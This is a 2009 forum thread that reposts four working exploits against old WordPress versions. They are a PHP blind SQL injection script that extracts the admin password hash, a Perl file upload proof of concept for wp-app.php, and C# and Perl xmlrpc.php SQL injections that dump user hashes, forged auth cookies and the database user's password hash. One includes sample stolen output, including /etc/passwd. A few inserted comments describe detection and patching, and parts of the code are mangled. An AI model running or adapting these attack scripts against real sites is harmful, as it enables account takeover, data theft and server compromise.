WordPress
aka_kludgeДата: Пятница, 05.06.2009, 12:04 | Сообщение # 1
Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

// NOTE(review): the opening `<?php` tag is not visible in this listing (the closing `?>`
// at the end is); presumably it was stripped by the forum rendering.
error_reporting(E_ALL);
$norm_delay = 0;// calibrated baseline delay in deciseconds, set by get_normdelay() below
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

// Cookie-name suffix: md5() of $url minus its last 24 characters, i.e. minus
// "/wp-admin/admin-ajax.php", so it is the md5 of the blog URL. The probe functions
// below embed it in the "wordpressuser_%s" / "wordpresspass_%s" cookie names, which
// matches how the other posts in this thread read this version's auth cookies.
if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

// Calibration: time cheap and expensive BENCHMARK() probes and keep the mean of the
// expensive ones. test_condition() treats any response slower than twice this value
// as "injected condition true".
$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

// Recovers the 32-character user_pass value of user $id, one character per binary
// search of timing probes (see get_hashchar()).
$hash = get_hash();

// Results are appended to $outfile.
add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

// Defender note: every probe carries "UNION ALL SELECT" and "BENCHMARK(" inside the
// Cookie header, and a full run is hundreds of unusually slow requests to
// admin-ajax.php -- both are straightforward log/WAF signatures. The injected cookie
// path is specific to WordPress 2.1.3-era code; keeping WordPress current removes it.
echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! smile \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
// Recovers the target user's user_pass column one position at a time through
// get_hashchar(), echoing progress after each character, and returns the
// concatenated string. $len = 32 matches the hex MD5 hashes the other posts in this
// thread report user_pass to contain.
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...\n";

// Positions are 1-based because SUBSTRING() in the injected SQL is 1-based.
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}

echo "\nFinal result: $field=$out\n\n";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
// Recovers character $pos of $field for user $id by time-based blind injection: each
// probe asks MySQL to run BENCHMARK($cnt, MD5(1337)) only when a comparison on
// ORD(SUBSTRING($field,$pos,1)) holds, and test_condition() turns the measured delay
// into a boolean. Returns the character as a one-byte string. $cnt is four times the
// calibration count so a "true" probe is clearly slower than the baseline
// get_normdelay() measured.
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
// Cookie body: the injection is placed in the wordpressuser_<suffix> cookie value after
// a double-URL-encoded quote (%2527); the wordpresspass_ cookie is a dummy value.
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
// Injection body: first %s = table prefix, %d = user ID, last %s = the comparison
// (">57", ">99", "=102", ...). The trailing "/*" comments out the rest of the query.
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
// ORD('9') is 57, so ">57" separates the hex letters a-f (97..102) from digits 0-9
// (48..57); the search range below is narrowed accordingly.
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
}

$curr = 0;// overwritten on the first iteration

// Binary search on the ORD() value. A "bigger" answer raises $min to $curr even
// though $curr itself is already excluded (the test is strictly greater), so once
// the interval is narrower than 2 a final equality probe against $max decides
// between the two remaining candidates. The loop only leaves via that break.
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min\n";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
// Sends cookie body $p through make_post() and returns true when the round trip took
// more than twice the calibrated $norm_delay (both in deciseconds). The request is
// repeated, at most $maxtry times before die(), until the server answers exactly the
// string '-1' -- presumably what admin-ajax.php returns for this request when nothing
// went wrong; anything else, including false from a cURL failure, is retried.
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

// Strict string comparison here; test_md5delay() checks the same answer via intval().
if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...\n");
}
else
{
echo "trying again - try $try ...\n";
}
}
}

// Timing comes from the last (accepted) attempt only.
$diff = $end - $start;
$delay = intval($diff * 10);// deciseconds, same unit as get_normdelay()

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
// Calibration: alternates three cheap probes (BENCHMARK count 1) with three expensive
// ones (count $testcnt) so that network jitter affects both series, prints every
// measurement, and returns the mean of the expensive ones in deciseconds. Note that
// the *delayed* mean is what is returned and later used as the threshold base; the
// non-delayed mean is only printed. The $testcnt parameter shadows the global of the
// same name.
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
// Measures the round trip, in deciseconds, of one probe whose injected condition
// LENGTH(user_pass)>31 is expected to hold for a 32-character hash, so that
// BENCHMARK($cnt, MD5(1337)) always runs. Exits the script unless the server answered
// -1 (compared via intval(); test_condition() does the same check with a strict
// string compare).
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;// placeholder, always overwritten below
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
// Current Unix time as a float with microsecond resolution; the same value the
// "usec sec" string form of microtime() yields once both parts are added together.
return microtime(true);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
// Generic cURL POST helper: sends $post_fields to $url with an MSIE 6 user agent, no
// redirect following and a 120 s connect timeout, adding a Cookie and/or Referer
// header only when those arguments are non-empty. Returns the response body (with
// the response headers prepended when $headers is exactly TRUE), or false when cURL
// fails.
$options = array(
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_CONNECTTIMEOUT => 120,
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $post_fields,
CURLOPT_FOLLOWLOCATION => 0,
CURLOPT_USERAGENT => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)',
CURLOPT_HEADER => ($headers === TRUE),
);

if(!empty($cookie))
{
$options[CURLOPT_COOKIE] = $cookie;
}

if(!empty($referer))
{
$options[CURLOPT_REFERER] = $referer;
}

$handle = curl_init();
curl_setopt_array($handle, $options);
$body = curl_exec($handle);
curl_close($handle);

return $body;
}
///////////////////////////////////////////////////////////////////////
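function add_line($buf)
{
// Appends $buf plus a newline to the log file named by the global $outfile.
// If the file cannot be opened the failure is reported and the line is dropped,
// instead of passing false on to fwrite()/fclose() (a warning on PHP 7, a fatal
// TypeError on PHP 8).
global $outfile;

$fh = fopen($outfile, 'ab');
if($fh === false)
{
echo "add_line() - could not open log file $outfile\n";
return;
}

fwrite($fh, $buf . "\n");
fclose($fh);
}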
///////////////////////////////////////////////////////////////////////
?>

 
aka_kludgeДата: Пятница, 05.06.2009, 12:05 | Сообщение # 2
WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

#! /usr/bin/env perl

# Wordpress 2.2 and Wordpress MU <= 1.2.2 Arbitrary File Upload PoC
#
# Credits : Alexander Concha
# Website : http://www.buayacorp.com/
# Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html
#
# NOTE(review): no `use strict`/`use warnings`; $url, $auth_cookie, $request and
# $response below are package globals assigned without `my`.

use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;

my $ua = new LWP::UserAgent;
my $blog = $ARGV[0];         # blog base URL, normalised to one trailing slash below
my $user = $ARGV[1];         # account with author/editor/administrator role
my $pass = $ARGV[2];         # its password; only ever used double-MD5'd in the cookie
my $remote_file = $ARGV[3];  # destination path stored in the _wp_attached_file meta
my $local_file = $ARGV[4];   # file whose contents are PUT (optional, see get_contents)
my $post_id = $ARGV[5];      # reuse an existing post instead of creating one (optional)

# NOTE(review): the usage text has lost its angle-bracket argument names (each line
# now starts at " - "), presumably stripped by the forum rendering.
if (@ARGV < 4) {
print "\nUsage:\n";
print " wp-file-upload.pl [local_file] [post_id]\n\n";
print " - full path to WordPress. http://victim.com/wordpress/ \n";
print " - valid username with any of these roles: author, editor, administrator\n";
print " - valid password for the user\n";
print " - full path to the remote file. /home/vulnerable.com/wordpress/wp-content/uploads/foo.php\n";
print " [local_file] - file to upload\n";
print " [post_id] - every time this script is executed creates a new post, specify a post_ID if you already run it\n\n";
exit();
}
# Follow redirects for no method at all, so the raw Location / Set-Cookie headers
# stay visible to the checks below.
$ua->requests_redirectable([]);
$blog =~ s/\/*$/\//;

# Locate the Atom publishing endpoint: wp-app.php first, app.php as a fallback.
# Relative URLs work here because the simple_request override further down prepends
# $blog to every request made through $ua (Perl compiles named subs before run time).
$url = 'wp-app.php';
if ( 200 != $ua->head($url . '?action=/service')->code ) {
$url = 'app.php';
die "\nIt seems that this WP installation is not vulnerable: app.php and wp-app.php were not found.\n"
unless 200 == $ua->head($url . '?action=/service')->code;
}

$auth_cookie = get_auth_cookie();

# Overrides LWP::UserAgent::simple_request process-wide so that every request sent
# through $ua is rewritten before dispatch: the forged auth cookie is attached, the
# relative URI is prefixed with $blog, and PUT bodies are labelled image/gif
# (presumably so the upload looks like an image attachment). The
# _request_sanity_check / prepare_request / send_request sequence is LWP's own
# internal request path; each request is echoed as "METHOD URI STATUS".
sub LWP::UserAgent::simple_request {
my($self, $request, $arg, $size) = @_;
$request->header('Cookie' => $auth_cookie);   # undef until get_auth_cookie() has run
$request->content_type('image/gif') if $request->method eq "PUT";
$request->uri($blog . $request->uri);

$self->_request_sanity_check($request);
my $new_request = $self->prepare_request($request);
$response = $self->send_request($new_request, $arg, $size);

print $request->method . " " . $request->uri . " " . $response->code . "\n";

return $response;
}

# Returns the upload body: the contents of $file when it exists on disk, otherwise an
# inline default.
# NOTE(review): this sub is mangled in the listing -- `join('', )` has lost its
# filehandle read, and `$file = <` followed by `PHP` is what remains of a `<<PHP`
# heredoc whose body was stripped, presumably by the forum's HTML rendering. As shown
# it does not parse.
sub get_contents {
$file = shift;
if ( -e $file ) {
open FILE, $file or die("Invalid local file");
$file = join('', );
close FILE;
} else {
$file = <
PHP
}
return $file;
}
# Builds this WordPress version's auth cookie pair without logging in: a HEAD on
# wp-login.php?logout makes the server emit its cookie names, the suffix after
# "wordpressuser"/"wordpresspass" is captured, and the pass cookie is set to
# md5(md5(password)). Returns '' when no matching Set-Cookie header is seen.
# Defender note: because the cookie is only a second MD5 over the stored hash, any
# user_pass leak (see the SQL injection posts in this thread) is directly a session
# forgery; later WordPress versions replaced this scheme with keyed cookies.
sub get_auth_cookie {
$response = $ua->head('wp-login.php?logout');
if ( $response->headers->header('Set-Cookie') =~ m/wordpress(user|pass)(.*?)=/ ) {
return "wordpressuser$2=$user;wordpresspass$2=".md5_hex(md5_hex($pass));
}
return '';
}
# Step 1 (only when no post_id was supplied): read a fresh _wpnonce from post-new.php,
# then create a post whose custom field "_wp_attached_file" is set to $remote_file.
# The new post's id is taken from the "posted=<id>" Location header of the redirect.
if (0 == $post_id) {
$response = $ua->get('wp-admin/post-new.php');
die ("\nInvalid credentials or blog url.\n\n" . $response->as_string) unless 200 == $response->code;

if ( $response->content =~ m/name=._wpnonce. value=.([a-z\d]{10})./ ) {
$response = $ua->post('wp-admin/post.php', [
'_wpnonce' => $1,
'action' => 'post',
'post_ID' => $post_id,
'post_type' => 'post',
'post_title' => 'foo',
'metakeyselect' => '#NONE#',
'metakeyinput' => '_wp_attached_file',
'metavalue' => $remote_file
], 'Cookie' => $auth_cookie);

# Checks for post-new.php?posted=post_ID
if ( $response->headers->header('Location') =~ m/posted=(\d+)/ ) {
$post_id = $1;
}
}
}
die "\nCould not get a valid post_id value.\n" unless 0 != $post_id;

# Step 2: PUT the upload body to the attachment endpoint of that post; the server
# presumably writes it to the path chosen through _wp_attached_file in step 1 (see the
# advisory in the header). A 200 is reported as success.
# Defender note: the precondition is an author-level account being allowed to set the
# _wp_attached_file custom field to an arbitrary path; the header lists 2.2 and
# MU <= 1.2.2 as affected, so upgrading is the remedy.
$request = HTTP::Request->new(PUT => $url . '?action=/attachment/file/'.$post_id);
$request->content(get_contents($local_file));
$response = $ua->request($request);

if ( 200 == $response->code ) {
print "\nIt seems that the file has been posted successfully... :P\n";
print "Use the following value to update the remote file: post_id '$post_id'\n";
} else {
print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n";
}

 
aka_kludgeДата: Пятница, 05.06.2009, 12:06 | Сообщение # 3
Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit

/*
El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:

function wp_suggestCategories($args) {
global $wpdb;

$this->escape($args);

$blog_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = $args[4];

if(!$this->login_pass_ok($username, $password)) {
return($this->error);
}

// Only set a limit if one was provided.
$limit = "";
if(!empty($max_results)) {
$limit = "LIMIT {$max_results}";
}

$category_suggestions = $wpdb->get_results("
SELECT cat_ID category_id,
cat_name category_name
FROM {$wpdb->categories}
WHERE cat_name LIKE '{$category}%'
{$limit}
");

return($category_suggestions);
}

Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo subscriber basta y sobra) en el sitio víctima.

Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario.

Credits: Alex de la Concha

code c sharp:
*/

using System;
using System.Net;
using System.Text;
using System.Xml;
using System.Text.RegularExpressions;
using System.Security.Cryptography;

// Proof of concept for the wp.suggestCategories injection explained in the comment
// above: the unfiltered max_results argument lands in the LIMIT clause, so an
// authenticated (subscriber-level) XML-RPC caller can UNION the users table into the
// category suggestions. The fix quoted below the listing is casting max_results to int.
// NOTE(review): the XML-RPC envelope in `data` has lost its element markup here (only
// text content survives), presumably stripped by the forum rendering.
class Program
{
static void Main(string[] args)
{
// Target blog and the low-privilege credentials that satisfy login_pass_ok().
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";

// Format slots: {0} login, {1} password, {2} table prefix. The last line is the
// max_results argument, i.e. the text that becomes "LIMIT ..." in the query.
string data = @"
wp.suggestCategories

1
{0}
{1}
1
0 UNION ALL SELECT user_login, user_pass FROM {2}users

";

string cookieHash = GetCookieHash(targetUrl);

using (WebClient request = new WebClient())
{
/* Try the default prefix first */
string response = request.UploadString(targetUrl + "xmlrpc.php",
string.Format(data, login, password, "wp_svn_"));

/* Issue a new request if the previous query failed */
// The error text returned for a failed query echoes "FROM <prefix>categories",
// which leaks the real table prefix; the request is then repeated with it.
Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
if (match.Success)
{
response = request.UploadString(targetUrl + "xmlrpc.php ",
string.Format(data, login, password, match.Groups[1].Value));
}

try
{
XmlDocument doc = new XmlDocument();
doc.LoadXml(response);

// Each category_id/category_name pair of the response carries one
// (user_login, user_pass) row from the UNION.
XmlNodeList nodes = doc.SelectNodes("//struct/member/value");

// A /methodResponse/fault element means the call was rejected.
if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
{
string user, pass;
/* Print, per row:
* user md5(password)
* authentication cookie
*
*/
// The cookie pair is wordpressuser_<hash>=<login>; wordpresspass_<hash>=md5(stored
// hash) -- the scheme this WordPress version accepted, which is why a leaked hash
// is directly a usable session.
for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
{
user = nodes.Item(i).InnerText;
pass = nodes.Item(i + 1).InnerText;
Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
user,
pass);
Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
cookieHash,
user,
MD5(pass));
}
}
else
{
Console.WriteLine("Error:\n{0}", response);
}
}
catch (Exception ex)
{
Console.WriteLine("Error:\n" + ex.ToString());
}
}
}

// Sends a HEAD to the logout URL without following its redirect and captures the
// 32-hex cookie-name suffix from Set-Cookie (the "wordpress<name>_<hash>" naming of
// this version). Returns "" when no such cookie is present. Note: the WebResponse is
// never closed/disposed.
private static string GetCookieHash(string targetUrl)
{
WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
request.Method = "HEAD";
(request as HttpWebRequest).AllowAutoRedirect = false;

WebResponse response = request.GetResponse();
if (response != null)
{
Match match = Regex.Match(response.Headers["Set-Cookie"],
@"wordpress[a-z]+_([a-z\d]{32})",
RegexOptions.IgnoreCase);

if (match.Success)
return match.Groups[1].Value;
}
return string.Empty;
}
// Lowercase hex MD5 of the UTF-8 bytes of password. (.ToLower() is redundant: the
// "x2" format already produces lowercase digits.)
public static string MD5(string password)
{
MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
byte[] bs = Encoding.UTF8.GetBytes(password);
bs = x.ComputeHash(bs);
StringBuilder s = new StringBuilder();
foreach (byte b in bs)
{
s.Append(b.ToString("x2").ToLower());
}
return s.ToString();
}
}
/*
Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, la solución es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o, en su defecto, bloquear el acceso a xmlrpc.php.

Lo malo es que tienes que tener una cuenta, aunque sea con los mínimos permisos, para obtener los demás nombres de usuario con sus respectivos MD5.

static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";

Ahí sería la ruta donde está colocado el WordPress 2.2, tu nombre de usuario y tu password.
Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ]

:: [Slappter] ::
*/

 
aka_kludgeДата: Пятница, 05.06.2009, 12:07 | Сообщение # 4
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

#!/usr/bin/perl -w

#Wordpress 2.1.2 SQL Injection POC
#Credits: sid@notsosecure.com
#Thanks to ferruh (ferruh@mavituna.com)for improving my exploitation skills
#website:www.notsosecure.com

#Wordpress version 2.1.2 is vulnerable to SQL injection. This POC works when exploiting with the credentials of a valid user. The user can belong to the 'contributor' role or any higher role. Versions before 2.1.2 have not been tested but are most likely vulnerable as well.

#Example:---------------------------------------------------------------------------------------
#C:\wp-xmlrpc-2-2-sql.pl" http://192.168.2.4/apache2-default/wordpress/ author author 5
#
# The usage is correct
#

  • Trying Host http://192.168.2.4/apache2-default/wordpress/ ...
    #[+] The xmlrpc-2-2 server seems to be working
    #--------------------
    #Username for id = 1 is:--> admin
    #
    #Md5 hash for user: admin
    #
    #is: 21232f297a57a5a743894a0e4a801fc3
    #
    #--------------------
    #Username for id = 2 is:--> contri
    #
    #Md5 hash for user: contri
    #
    #is: 95a178dde9d3fa2bde4971f10d3acc3e
    #
    #--------------------
    #Username for id = 3 is:--> author
    #
    #Md5 hash for user: author
    #
    #is: 02bd92faa38aaa6cc0ea75e59937a1ef
    #
    #-----------------------
    #Total Number of Users found:-->3
    #-----------------------
    #Mysql is running as: root@localhost
    #
    #Encrypted password for: root@localhost
    # is: root@localhost67457e226a1a15bd
    #
    #This deserves no mercy.... Lets get the /etc/passwd
    #.......imho...Here is the /etc/passwd file:
    #root:x:0:0:root:/root:/bin/bash
    #daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    #bin:x:2:2:bin:/bin:/bin/sh
    #sys:x:3:3:sys:/dev:/bin/sh
    #sync:x:4:65534:sync:/bin:/bin/sync
    #games:x:5:60:games:/usr/games:/bin/sh
    #man:x:6:12:man:/var/cache/man:/bin/sh
    #lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    #mail:x:8:8:mail:/var/mail:/bin/sh
    #news:x:9:9:news:/var/spool/news:/bin/sh
    #uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    #proxy:x:13:13:proxy:/bin:/bin/sh
    #www-data:x:33:33:www-data:/var/www:/bin/sh
    #backup:x:34:34:backup:/var/backups:/bin/sh
    #list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    #gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    #messagebus:x:100:103::/var/run/dbus:/bin/false
    #postgres:x:101:105:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    #haldaemon:x:103:109:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
    #gdm:x:104:112:Gnome Display Manager:/var/lib/gdm:/bin/false
    #mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
    #sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
    #snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
    #postfix:x:108:116::/var/spool/postfix:/bin/false
    #stunnel4:x:109:118::/var/run/stunnel4:/bin/false
    #arpwatch:x:111:120:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
    #statd:x:112:65534::/var/lib/nfs:/bin/false
    #sfs:x:113:121::/var/lib/sfs:/bin/false
    #ftp:x:114:65534::/home/ftp:/bin/false
    #Debian-exim:x:115:122::/var/spool/exim4:/bin/false
    #telnetd:x:116:123::/nonexistent:/bin/false
    #-------------------------------------------------------------------------------------------------------
    #use warnings;
    # Error-based SQL injection through the XML-RPC mt.setPostCategories method: the
    # post id is concatenated into SQL, and the failing "DELETE FROM wp_post2cat" query
    # is echoed back to the client together with the injected column value, which the
    # script cuts out with split()/substr().
    # NOTE(review): the XML-RPC envelopes in $sql/$sql2/$sql3/$sql4 have lost their
    # markup in this listing (only element text remains) and the "[*]" progress markers
    # in the header and in the first print were rendered as bullets, presumably by the
    # forum; neither is how the script was written.
    use LWP::UserAgent;
    my $ua = new LWP::UserAgent;
    $ua->agent("Wordpress Hash Grabber v2.0" . $ua->agent);

    my $host = $ARGV[0]; # The path to xmlrpc.php
    my $username= $ARGV[1];#username
    my $password= $ARGV[2];#password
    my $postid= $ARGV[3];#post id which the user can edit
    my $pref = 'wp_'; # database prefix! (declared but unused: the queries below hard-code wp_)
    my $hash_pass="";

    #$root='root@localhost.com';

    if (@ARGV < 4)
    {
    print " -----------------------------------------------------------------------\n";
    print " wp-xmlrpc-sql.pl - Wordpress xmlrpc.php 'post_id' sql injection exploit\n Version 2.1.2";
    print " by NotSoSecure // www.notsosecure.com \n";
    print " coded by sid //sid\@notsosecure.com // 31.03.2007\n";
    print " ------------------------------------------------------------------------\n";
    print " Usage:\n";
    print " wp-xmlrpc-sql.pl \n";
    print "\n";
    print " - host for attack\n full path eg. http://192.168.1.4/wordpress/ ";
    print " - valid username, can be in any of these role: contributor, author, editor \n";
    print " - valid password for the user\n";
    print " - valid post_id which the user can edit\n";
    print " ------------------------------------------------------------------------\n";
    exit();
    }

    print "\n The usage is correct\n

  • Trying Host $host ...\n";

    # Sanity check: a GET to xmlrpc.php must yield the server's "POST only" message.
    my $res = $ua->get($host.'/xmlrpc.php');

    if ( $res->content =~ /XML-RPC server accepts POST requests only/is )
    {
    print "[+] The xmlrpc server seems to be working \n";
    }
    else
    {
    print "--------------------\n";
    print "[error]--> Something seems to be wrong with the xmlrpc.php \nCheck the full path to xmlrpc.php again\n ";
    # Sloppy way of debugging, remove if you want
    open(LOG, ">wp_out.html"); print LOG $res->content;
    exit;
    }

    # $i is a package global (no `my`). Ids 1..100 are probed in order; the `else`
    # branch below exits the script at the first id that does not echo the query.
    for ($i=1; $i<=100 ;$i++)
    {

    #bug: if a user has been deleted the corresponding id will be missing.
    #change this to point to the known ids or the usernames, or just make it go for top 100 ids

    #obtaining usernames and userid
    my $sql = "mt.setPostCategories ".$postid." union all select user_login from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req->content($sql);
    $res = $ua->request($req);
    $out = $res->content;


    if($out=~ /Bad login\/pass combination/)
    {
    print "--------------------\n";
    print "[error]-->Invalid username/password conbination\n";

    exit;
    }

    if($out=~ /Sorry, you can not edit this post/)
    {
    print "--------------------\n";
    print "[error]-->INVALID postid \n Supply a post id which can be edited by this user.\n";

    exit;
    }

    # The echoed failing DELETE query marks a hit: split on "category_id =" and slice
    # the injected value that follows it.
    if ($out =~ /DELETE FROM wp_post2cat/)
    {

    #print "found";
    print "--------------------\n";

    @result2=split(/category_id =/,$out);

    #to do: remove the assumption that username is less than 10 char
    $final=substr($result2[1],1,10);

    print "Username for id = ".$i." is:--> ".$final."\n";
    no warnings;
    #obtaining md5 hash for the username
    # Same injection, second column: user_pass for the same id (33 chars sliced;
    # presumably 32 hex digits plus a delimiter).
    my $sql2 = "mt.setPostCategories ".$postid." union all select user_pass from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req2->content($sql2);
    $res2 = $ua->request($req2);
    $out2 = $res2->content;

    @result3=split(/category_id =/,$out2);

    $hash=substr($result3[1],1,33);
    print "Md5 hash for user: ".$final." \nis: ".$hash."\n";

    }
    else
    {
    # First id without an echo: report the count (ids probed so far minus this one),
    # then move on to database-level probes and exit.
    print "-----------------------\n";
    print "Total Number of Users found:-->".($i-1)."\n";

    print "-----------------------\n";









    #lets find wat the db is running as:
    # user(): the MySQL account the blog connects with.

    my $sql2 = "mt.setPostCategories ".$postid." union all select user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req2->content($sql2);
    $res2 = $ua->request($req2);
    $out2 = $res2->content;

    @result3=split(/category_id =/,$out2);

    $hash_user=substr($result3[1],1,20);
    print "Mysql is running as: ".$hash_user."\n";

    #lets get the password hash of the db_user for offline cracking
    #buggy code
    # Reading mysql.user needs SELECT on the mysql schema; the "SELECT command denied"
    # branch below is the expected outcome for a least-privilege blog account.
    my $sql3 = "mt.setPostCategories ".$postid." union all select concat(user(),mysql.user.Password) from mysql.user where user=user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req3 = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req3->content($sql3);
    $res3 = $ua->request($req3);
    $out3 = $res3->content;
    my $hash_pass="";
    #print $out3;
    if ($out3=~m/SELECT command denied to user/) {
    print "Cant get the password for this user, \nPermission Denied, Thats better security!!";
    exit;}
    else{
    @result3=split(/category_id =/,$out3);
    $hash_pass=substr($result3[1],1,30);
    print $hash_pass;
    if ($hash_pass eq "") {
    print "No Password set";
    }
    else{
    print "Encrypted password for: ".$hash_user."\n is ".$hash_pass."\n";
